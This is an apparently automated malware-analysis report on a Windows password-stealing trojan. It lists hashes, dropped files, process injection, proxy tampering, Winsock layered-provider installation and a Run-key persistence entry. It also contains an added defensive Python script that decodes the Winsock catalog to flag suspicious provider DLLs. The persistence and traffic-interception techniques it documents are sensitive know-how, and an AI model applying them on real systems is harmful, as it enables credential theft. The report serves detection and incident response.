HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Graftor.37429 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: 5193a201b7355f6ac00af96184d29d5d
SHA1: d66f981e23494860656b31e27e5dd4fcf8d91b46
SHA256: 4aa669e7382244709987ac4d6e52f0c966f373c65353d9d6778e6d5bd92fae51
SSDeep: 98304:GQHA/3XxoSj3XsbIABdUf0uXFvWomZHF7b MxntyV n:GQHAfxdjH4I8qVJGHF/txt n
Size: 5135223 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-08-14 22:15:49
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan-PSW. A Trojan program intended to steal users' passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
svchostlsp.exe:3736
%original file name%.exe:452
117my.exe:2736
117my.exe:944
The Trojan injects its code into the following process(es):
svchosl.exe:3732
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process svchostlsp.exe:3736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\twain_32\config\ESPI11.dll (244 bytes)
C:\Windows\System32\addressoftext.inscan (1 bytes)
C:\Windows\System32\ESPI11.dll (723 bytes)
The process %original file name%.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\svchost.exe (12649 bytes)
C:\Windows\117my.exe (7296 bytes)
C:\Windows\117my.com.bat (258 bytes)
C:\Windows\Game.ico:Zone.Identifier (26 bytes)
C:\Windows\svchosl.exe (8713 bytes)
C:\Windows\Game.ico (1978 bytes)
C:\Windows\117my.skn (2160 bytes)
C:\Users\"%CurrentUserName%"\Desktop\117魔域7.1.lnk (1 bytes)
The Trojan deletes the following file(s):
C:\Windows\__tmp_rar_sfx_access_check_1308957 (0 bytes)
The process svchosl.exe:3732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YBU4WGCW.txt (103 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\host[1].htm (775 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CCQ2R3OL.txt (0 bytes)
The process 117my.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.exe (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\svchostlsp.exe (1948 bytes)
The process 117my.exe:944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\JpHrc.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Mag.dat (101 bytes)
C:\Windows\System32\drivers\etc\hosts (39 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Repairdata.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.skn (62 bytes)
C:\Windows\117my.skn (65 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\117my.ini (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\iat.dll (89 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OF9L3DR3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\fc72ORSzwyUu08nYIdyG-ygy8w8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\fc07[1].swf (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\eS-nxtWWJ1LfBWLfd096swuFjH4[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\9fkhsVhseQ-JJcxiLZwCHjhHY[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BPMHTAIlmc5kh6Tymb1I2mmfSAc[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ZZxR-E_UBI8_1IS7VtDkH_bgw[1].css (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\JpHrc.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K3H6JGON.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\VqEnvKPzCrM8a4pakUu0bzh7d9o[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G6NPTRAV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\watch[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HGQPYGV7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YBU4WGCW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4CWVLDFS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Repairdata.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\search[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\983WD333.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\spacer[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ya_favicon_ru[1].ico (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\AllServices[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fc07_2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\P2Z07O4S.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VPSNR0J4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\nearest[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Tsv1TyvAx4g5KyOkiAdSP1Stniw[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SK6RC4AQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8WNTYFZE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\otvet.mail[1].png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_search.uk[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\MG_en-us[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\GetMDRCDPOSTURL[1].aspx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7ZFPBM01.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KJGZP41Y.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NWCBOWT9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Yd__VnAFnBZBQiIS0sHoF6FGRC8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KE9BMB37.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XJJJSX58.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IAU75TW2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\jquery.min[1].js (0 bytes)
Registry activity
The process svchostlsp.exe:3736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\ESPI11]
"FileName" = "C:\Windows\system32\ESPI11.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\ESPI11]
"1014" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
"1012" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\ESPI11]
"1002" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
"1003" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
"1001" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU]
"wodezhucbxm_1" = "393972"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"FileDirectory" = "%windir%\tracing"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
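The keys written under WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries above are the Winsock 2 protocol catalog, and the WinSock2\ESPI11 key names C:\Windows\system32\ESPI11.dll, a DLL the same process drops. Each PackedCatalogItem value starts with the ANSI path of the provider DLL (the truncated hex the report shows, 43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65, decodes to "C:\Windows\syste"), followed by a WSAPROTOCOL_INFOW structure whose ChainLen field distinguishes a base provider (1) from a Layered Service Provider entry (0) and a protocol chain routed through one (greater than 1). An LSP DLL is loaded into every process that opens a Winsock socket, so the catalog is a place to check on any host that ran this sample. The following added example (not part of the Lavasoft report) decodes such blobs and flags LSP entries and provider DLLs that are not known Windows ones; the catalog items it builds are constructed test data, the GUIDs in them are placeholders, and the set of known provider DLLs is an assumption to adjust for the Windows build being examined.

```python
import struct
import uuid

# One PackedCatalogItem value under
# HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\<n>
# is: char szProviderPath[260] (ANSI, NUL padded) + WSAPROTOCOL_INFOW (628 bytes, little-endian).
PATH_LEN = 260
# WSAPROTOCOL_INFOW: dwServiceFlags1-4, dwProviderFlags, ProviderId, dwCatalogEntryId,
# ProtocolChain.ChainLen, ChainEntries[7], iVersion, iAddressFamily, iMaxSockAddr, iMinSockAddr,
# iSocketType, iProtocol, iProtocolMaxOffset, iNetworkByteOrder, iSecurityScheme,
# dwMessageSize, dwProviderReserved, szProtocol[256] (UTF-16).
INFO_FMT = "<5I16sIi7i11i512s"
ITEM_LEN = PATH_LEN + struct.calcsize(INFO_FMT)  # 888 bytes

# Provider DLLs present in a clean Windows 7 Protocol_Catalog9 (assumption; adjust per build).
KNOWN_PROVIDER_DLLS = {"mswsock.dll", "wshbth.dll"}


def decode_hex_dump(hex_text):
    """Turn the 'AA BB CC' hex a registry export shows for a REG_BINARY value into the
    NUL-terminated ANSI string at its start (for PackedCatalogItem, the provider path)."""
    raw = bytes.fromhex(hex_text.replace(" ", ""))
    return raw.split(b"\0", 1)[0].decode("cp1252", errors="replace")


def parse_packed_catalog_item(blob):
    """Decode one PackedCatalogItem blob into the fields that matter for triage."""
    if len(blob) != ITEM_LEN:
        raise ValueError("expected %d-byte PackedCatalogItem, got %d" % (ITEM_LEN, len(blob)))
    path = blob[:PATH_LEN].split(b"\0", 1)[0].decode("cp1252", errors="replace")
    f = struct.unpack(INFO_FMT, blob[PATH_LEN:])
    chain_len = f[7]
    return {
        "path": path,
        "provider_id": str(uuid.UUID(bytes_le=f[5])),
        "catalog_id": f[6],
        # ChainLen 1 = base provider, 0 = layered provider (the LSP DLL itself),
        # >1 = protocol chain; ChainEntries then lists catalog IDs from the top LSP to the base.
        "chain_len": chain_len,
        "chain": list(f[8:8 + chain_len]) if chain_len > 1 else [],
        "address_family": f[16],
        "socket_type": f[19],
        "protocol": f[20],
        "name": f[26].decode("utf-16-le", errors="replace").split("\0", 1)[0],
    }


def audit_catalog(blobs):
    """Return (catalog_id, path, reasons) for every entry a responder should look at:
    LSP entries, chains that route traffic through one, and unknown provider DLLs."""
    entries = [parse_packed_catalog_item(b) for b in blobs]
    by_id = {e["catalog_id"]: e for e in entries}
    findings = []
    for e in entries:
        reasons = []
        dll = e["path"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if dll not in KNOWN_PROVIDER_DLLS:
            reasons.append("unknown provider dll")
        if e["chain_len"] == 0:
            reasons.append("layered service provider")
        elif e["chain_len"] > 1:
            layers = [by_id[i]["path"] for i in e["chain"][:-1] if i in by_id]
            reasons.append("chain through " + ", ".join(layers))
        if reasons:
            findings.append((e["catalog_id"], e["path"], reasons))
    return findings


def read_live_catalog():
    """On a Windows host, read the blobs from the registry (the 32-bit catalog this report
    shows; 64-bit Windows keeps a second one under Catalog_Entries64)."""
    import winreg
    base = r"SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries"
    blobs = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base) as key:
        for i in range(winreg.QueryInfoKey(key)[0]):
            with winreg.OpenKey(key, winreg.EnumKey(key, i)) as sub:
                blobs.append(winreg.QueryValueEx(sub, "PackedCatalogItem")[0])
    return blobs


def build_item(path, catalog_id, chain, name, provider_id):
    """Constructed catalog entry for the demonstration (not dumped from a real host)."""
    chain_entries = (list(chain) + [0] * 7)[:7]
    info = struct.pack(INFO_FMT, 0, 0, 0, 0, 0, provider_id.bytes_le, catalog_id,
                       len(chain), *chain_entries,
                       2, 2, 16, 16, 1, 6, 0, 0, 0, 0, 0,  # iVersion 2, AF_INET, SOCK_STREAM, IPPROTO_TCP
                       name.encode("utf-16-le").ljust(512, b"\0"))
    return path.encode("cp1252").ljust(PATH_LEN, b"\0") + info


# Placeholder GUIDs. A clean base provider, the LSP entry itself, and the chain an LSP
# installer adds so that TCP traffic passes through the LSP before reaching mswsock.dll.
SAMPLE_CATALOG = [
    build_item(r"%SystemRoot%\system32\mswsock.dll", 1001, [1001],
               "MSAFD Tcpip [TCP/IP]", uuid.UUID("00000000-0000-0000-0000-000000000001")),
    build_item(r"C:\Windows\system32\ESPI11.dll", 1010, [],
               "ESPI11", uuid.UUID("00000000-0000-0000-0000-000000000002")),
    build_item(r"C:\Windows\system32\ESPI11.dll", 1011, [1010, 1001],
               "ESPI11 over MSAFD Tcpip [TCP/IP]", uuid.UUID("00000000-0000-0000-0000-000000000002")),
]
```

Run `audit_catalog(read_live_catalog())` on a suspect host, or feed it blobs pulled from an offline SYSTEM hive; on the constructed catalog it reports the LSP entry 1010 and the chain entry 1011 and stays silent about mswsock.dll. The 1001-1014 values under WinSock2\ESPI11 in the report begin with "%SystemRoot%\sys" when decoded the same way, which is the prefix of the stock provider path, but the report gives no more of them and this example does not interpret that key.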
The process %original file name%.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process svchosl.exe:3732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU]
"wodezpoiuy_5" = "328482"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASMANCS]
"EnableFileTracing" = "0"
To run itself each time Windows is booted, the Trojan adds the following reference to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xf1" = "C:\Windows\svchosl.exe /start"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process 117my.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 117my.exe:944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"
